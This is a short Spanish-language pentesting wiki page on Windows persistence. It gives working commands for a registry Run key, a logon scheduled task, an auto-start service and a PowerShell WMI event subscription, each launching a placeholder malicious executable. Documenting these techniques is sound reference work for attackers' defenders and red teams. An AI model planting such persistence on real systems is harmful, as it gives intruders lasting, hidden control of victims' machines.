Persistencia en Windows
Última actualización
¿Te fue útil?
Última actualización
¿Te fue útil?
¿Te fue útil?
Modificar claves del registro es una técnica común para lograr persistencia. Al agregar entradas maliciosas en el registro, los atacantes pueden asegurarse de que su código se ejecute automáticamente al iniciar el sistema.
Run/RunOnce:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyApp /t REG_SZ /d "C:\ruta\maliciosa.exe"
Los atacantes pueden crear tareas programadas que ejecuten su payload en intervalos regulares o al inicio del sistema.
schtasks:
schtasks /create /sc onlogon /tn "MyTask" /tr "C:\ruta\maliciosa.exe"
Crear o modificar servicios de Windows para que ejecuten el payload al inicio del sistema.
sc:
sc create MyService binPath= "C:\ruta\maliciosa.exe" start= auto
Utilizar WMI para suscribirse a eventos del sistema y ejecutar código malicioso en respuesta a ciertos eventos, como el inicio del sistema.
PowerShell:
$filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments @{
Name = "MyEventFilter";
EventNamespace = "root\cimv2";
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'";
QueryLanguage = "WQL";
}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{
Name = "MyConsumer";
CommandLineTemplate = "C:\ruta\maliciosa.exe";
}
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{
Filter = $filter;
Consumer = $consumer;
}